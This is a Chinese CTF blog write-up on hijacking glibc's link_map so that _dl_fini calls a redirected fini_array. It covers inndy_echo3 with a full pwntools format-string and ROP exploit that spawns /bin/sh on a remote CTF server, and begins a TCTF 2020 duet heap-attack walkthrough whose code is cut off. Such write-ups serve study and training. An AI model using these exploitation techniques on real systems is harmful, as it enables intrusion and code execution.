<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"github.com","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.json"};
  </script>

  <meta name="description" content="在glibc中，当一个程序调用glibc中的exit函数时，exit函数内部会调用_dl_fini，而_dl_fini函数会调用程序中的fini_array段的函数指针去执行。查看glibc源码如下 123456789101112131415161718voidinternal_function_dl_fini (void)&#123;..........              &#x2F;* Firs">
<meta property="og:type" content="article">
<meta property="og:title" content="通过劫持ld中的linkmap来控制程序流">
<meta property="og:url" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/index.html">
<meta property="og:site_name" content="ha1vk&#39;s blog">
<meta property="og:description" content="在glibc中，当一个程序调用glibc中的exit函数时，exit函数内部会调用_dl_fini，而_dl_fini函数会调用程序中的fini_array段的函数指针去执行。查看glibc源码如下 123456789101112131415161718voidinternal_function_dl_fini (void)&#123;..........              &#x2F;* Firs">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image1.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image2.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image3.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image4.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image5.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image6.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image7.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image8.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image9.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image10.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image11.png">
<meta property="og:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image12.png">
<meta property="article:published_time" content="2020-07-26T09:45:11.000Z">
<meta property="article:modified_time" content="2025-06-26T02:20:34.177Z">
<meta property="article:author" content="ha1vk">
<meta property="article:tag" content="格式化字符串漏洞">
<meta property="article:tag" content="fastbin">
<meta property="article:tag" content="Tcache_Stashing_Unlink_Attack">
<meta property="article:tag" content="linkmap">
<meta property="article:tag" content="dl_resolve">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image1.png">

<link rel="canonical" href="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>通过劫持ld中的linkmap来控制程序流 | ha1vk's blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">ha1vk's blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://github.com/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="ha1vk">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="ha1vk's blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          通过劫持ld中的linkmap来控制程序流
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-07-26 17:45:11" itemprop="dateCreated datePublished" datetime="2020-07-26T17:45:11+08:00">2020-07-26</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>在glibc中，当一个程序调用glibc中的exit函数时，exit函数内部会调用_dl_fini，而_dl_fini函数会调用程序中的fini_array段的函数指针去执行。查看glibc源码如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span></span><br><span class="line">internal_function</span><br><span class="line">_dl_fini (<span class="type">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">..........</span><br><span class="line">              <span class="comment">/* First see whether an array is given.  */</span></span><br><span class="line">              <span class="keyword">if</span> (l-&gt;l_info[DT_FINI_ARRAY] != <span class="literal">NULL</span>)</span><br><span class="line">            &#123;</span><br><span class="line">              ElfW(Addr) *<span class="built_in">array</span> =</span><br><span class="line">                (ElfW(Addr) *) (l-&gt;l_addr</span><br><span class="line">                        + l-&gt;l_info[DT_FINI_ARRAY]-&gt;d_un.d_ptr);</span><br><span class="line">              <span class="type">unsigned</span> <span class="type">int</span> i = (l-&gt;l_info[DT_FINI_ARRAYSZ]-&gt;d_un.d_val</span><br><span class="line">                        / <span class="keyword">sizeof</span> (ElfW(Addr)));</span><br><span class="line">              <span class="keyword">while</span> (i-- &gt; <span class="number">0</span>)</span><br><span class="line">                ((<span class="type">fini_t</span>) <span class="built_in">array</span>[i]) ();</span><br><span class="line">            &#125;</span><br><span class="line">............</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们注意到，有一个函数指针数组的遍历调用执行。我们来看看ld.so中相应的汇编。</p>
<p>在glibc2.23 32位ld.so里，是这样的，一个循环，直到esi为0，如果我们能够接触linkmap，就可以控制edi,esi，从而将fini_array转移到我们可以控制的地方，在可控区布下ROP。</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image1.png" class="">

<p>再来看看64位的</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image2.png" class="">

<p>差不多也是这样，如果我们要做栈迁移，可以配合上一些gadget和setcontext的gadget，就可以将栈也迁移到我们可控的区域。</p>
<p>在glibc2.29以上，这点非常有用。在glibc 2.29，setcontext内部的参数不再是rdi，而是rdx，而我们劫持free_hook时，能控制的是rdi，可以借助其他gadget完成对rdx的转移。</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image3.png" class="">

<p>然后，当我们劫持了linkmap将fini_array转移到可控区以后，就不用再寻找gagdets来对rdx转移。我们看到在glibc 2.29下，其汇编是这样的</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image4.png" class="">

<p>可见，rdx在第二次调用时，也指向了可控区，因此，我们结合setcontext即可在同一个可控区一次性完成布置。结合large bin attack，通过large bin attack向link_map里的l_addr写入一个堆地址，这又成为一种堆利用手法，我暂且叫他house of haivk。</p>
<p>下面，我们用两个例题来说明其利用方式</p>
<h2 id="inndy-echo3"><a href="#inndy-echo3" class="headerlink" title="inndy_echo3"></a>inndy_echo3</h2><p>首先，检查一下程序的保护机制</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image5.png" class="">

<p>然后，我们用IDA分析一下，主函数通过alloca申请了一块随机大小的栈地址，然后传给hardfmt函数</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image6.png" class="">

<p>Hardfmt里有一个非栈上的格式化字符串漏洞，可以利用5次。</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image7.png" class="">

<p>由于在main里申请了随机大小的栈空间，因此hardfmt里相对栈里其他数据的距离会发生变化，因此，我们需要先拿一个固定的爆破。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">exploit</span>():</span><br><span class="line">   payload = <span class="string">&#x27;%8$p-%14$pEND&#x27;</span></span><br><span class="line">   sh.sendline(payload)</span><br><span class="line">   _IO_2_1_stdout_addr = <span class="built_in">int</span>(sh.recvuntil(<span class="string">&#x27;-&#x27;</span>,drop = <span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">   <span class="keyword">if</span> _IO_2_1_stdout_addr &amp; <span class="number">0xFFF</span> != <span class="number">0xD60</span>:</span><br><span class="line">      <span class="keyword">raise</span> Exception(<span class="string">&#x27;leak error&#x27;</span>)</span><br></pre></td></tr></table></figure>

<p>然后，我们就可以泄露地址，进而下一步利用。在这里，普通方法是继续利用格式化字符串，劫持栈做ROP等。这里，再介绍另一种方法，劫持linkmap里的l_addr，将fini_array转移到bss上的buff可控区内。<strong>[注意到栈里下方一个ld地址，其正好指向了linkmap里的l_addr的位置。]{.mark}</strong></p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image8.png" class="">

<p>因此，我们只需利用一次格式化字符串，即可将fini_array迁移到buff里。</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image9.png" class="">

<p>劫持以后，此时esi为1，意味着我们执行完这一次，不能继续执行后面的函数指针了。因此，首先利用gadgets将esi的值改大。现在edi指向我们的可控区buff，我们找到一条gadget</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#修改esi</span></span><br><span class="line"><span class="keyword">or</span> esi, dword ptr [edi + <span class="number">0xa</span>] ; ret</span><br></pre></td></tr></table></figure>
<p>将esi改大后，我们就可以继续执行下一个函数了，我们依次执行gets、system，即可完成system(command)的功能。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc-2.23_x86.so&#x27;</span>)</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">exploit</span>():</span><br><span class="line">   payload = <span class="string">&#x27;%8$p-%14$pEND&#x27;</span></span><br><span class="line">   sh.sendline(payload)</span><br><span class="line">   _IO_2_1_stdout_addr = <span class="built_in">int</span>(sh.recvuntil(<span class="string">&#x27;-&#x27;</span>,drop = <span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">   <span class="keyword">if</span> _IO_2_1_stdout_addr &amp; <span class="number">0xFFF</span> != <span class="number">0xD60</span>:</span><br><span class="line">      <span class="keyword">raise</span> Exception(<span class="string">&#x27;leak error&#x27;</span>)</span><br><span class="line">   stack_addr = <span class="built_in">int</span>(sh.recvuntil(<span class="string">&#x27;END&#x27;</span>,drop = <span class="literal">True</span>),<span class="number">16</span>)</span><br><span class="line">   libc_base = _IO_2_1_stdout_addr - libc.sym[<span class="string">&#x27;_IO_2_1_stdout_&#x27;</span>]</span><br><span class="line">   <span class="comment">#or esi, dword ptr [edi + 0xa] ; ret</span></span><br><span class="line">   or_esi_p_edi_a = libc_base + <span class="number">0x001760d2</span></span><br><span class="line">   <span class="comment">#push eax ; call dword ptr [eax + 0x10]</span></span><br><span class="line">   push_eax_call = libc_base + <span class="number">0x0005d4e2</span></span><br><span class="line">   system_addr = libc_base + libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">   gets_addr = libc_base + libc.sym[<span class="string">&#x27;gets&#x27;</span>]</span><br><span class="line">   <span class="built_in">print</span> <span class="string">&#x27;libc_base=&#x27;</span>,<span class="built_in">hex</span>(libc_base)</span><br><span class="line">   <span class="built_in">print</span> <span class="string">&#x27;stack_addr=&#x27;</span>,<span class="built_in">hex</span>(stack_addr)</span><br><span class="line"></span><br><span class="line">   payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span></span><br><span class="line">   payload += p32(or_esi_p_edi_a)</span><br><span class="line">   payload += <span class="string">&#x27;\x00&#x27;</span>*<span class="number">6</span></span><br><span class="line">   payload += p32(<span class="number">0x10</span>) <span class="comment">#使得or运算后，esi为0x10，这样就可以继续做rop了</span></span><br><span class="line">   payload += <span class="string">&#x27;\x00&#x27;</span>*<span class="number">0x2A</span></span><br><span class="line">   payload += p32(push_eax_call) <span class="comment">#gets调用完后，call [eax+0x10]处设置为system即可</span></span><br><span class="line">   payload += p32(gets_addr) <span class="comment">#先调用gets，然后eax返回了缓冲区地址</span></span><br><span class="line"></span><br><span class="line">   sh.sendline(payload)</span><br><span class="line">   sh.recvuntil(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x20</span>)</span><br><span class="line"></span><br><span class="line">   payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span> + <span class="string">&#x27;\x00&#x27;</span></span><br><span class="line">   sh.sendline(payload)</span><br><span class="line">   sh.recvuntil(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line">   payload = <span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span> + <span class="string">&#x27;\x00&#x27;</span></span><br><span class="line">   sh.sendline(payload)</span><br><span class="line">   sh.recvuntil(<span class="string">&#x27;a&#x27;</span>*<span class="number">0x10</span>)</span><br><span class="line"></span><br><span class="line">   <span class="comment">#修改linkmap里的r_offset</span></span><br><span class="line">   payload = <span class="string">&#x27;%&#x27;</span> + <span class="built_in">str</span>(<span class="number">0x194</span>) + <span class="string">&#x27;c%91$n\x00&#x27;</span></span><br><span class="line">   <span class="comment">#raw_input()</span></span><br><span class="line">   sh.sendline(payload)</span><br><span class="line">   payload = <span class="string">&#x27;/bin/sh\x00&#x27;</span>.ljust(<span class="number">0x10</span>) + p32(system_addr)</span><br><span class="line">   <span class="comment">#raw_input()</span></span><br><span class="line">   sleep(<span class="number">0.2</span>)</span><br><span class="line">   sh.sendline(payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">   <span class="keyword">try</span>:</span><br><span class="line">      <span class="keyword">global</span> sh</span><br><span class="line">      <span class="comment">#sh = process(&#x27;./echo3&#x27;,env=&#123;&#x27;LD_PRELOAD&#x27;:&#x27;./libc-2.23_x86.so&#x27;&#125;)</span></span><br><span class="line">      sh = remote(<span class="string">&#x27;node3.buuoj.cn&#x27;</span>,<span class="number">25102</span>)</span><br><span class="line">      exploit()</span><br><span class="line">      sh.interactive()</span><br><span class="line">   <span class="keyword">except</span>:</span><br><span class="line">      sh.close()</span><br><span class="line">      <span class="built_in">print</span> <span class="string">&#x27;trying...&#x27;</span></span><br></pre></td></tr></table></figure>

<h2 id="TCTF-2020-duet"><a href="#TCTF-2020-duet" class="headerlink" title="TCTF 2020 duet"></a>TCTF 2020 duet</h2><p>首先，检查一下程序的保护机制</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image10.png" class="">

<p>然后，我们用IDA分析一下</p>
<p>在backdoor里有溢出一字节的机会，但只能用1次</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image11.png" class="">

<p>Add功能中使用的是calloc，会清空数据</p>
<img src="/2020/07/26/%E9%80%9A%E8%BF%87%E5%8A%AB%E6%8C%81ld%E4%B8%AD%E7%9A%84linkmap%E6%9D%A5%E6%8E%A7%E5%88%B6%E7%A8%8B%E5%BA%8F%E6%B5%81/image12.png" class="">

<p>我们可以利用1字节溢出构造overlap chunk，然后进行Tcache Stashing Unlink Attack将global_max_fast修改为很大，然后，我们delete一个chunk，被放到fastbin里，在main_arena里，会留下一个1，这个1，可以被我们用来伪造一个0x100的fastbin，我们控制现有的fastbin的chunk，将main_arena里伪造的串入，然后申请到main_arena控制整个main_arena。有关TCACHE Stashing Unlink attack，可以见这篇文章<a target="_blank" rel="noopener" href="https://blog.csdn.net/seaaseesa/article/details/105870247">https://blog.csdn.net/seaaseesa/article/details/105870247</a></p>
<p>控制了main_arena，接下来，我们可以通过修改top chunk为任意位置的chunk处，从而分配到任意地址处，但是现在问题是，free_hook处没有可用的数据用于伪造，如果要让其有数据，还得再来一次堆攻击，但是现在堆已经混乱了，不好操作，而malloc_hook处使用one_gadget也打不通，现在一个好的方法就是劫持linkmap了，在linkmap里有很多数据可以供我们伪造chunk的size，从而分配过去。然后，利用setcontext，即可完成栈迁移，将栈一并迁移到linkmap里。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span 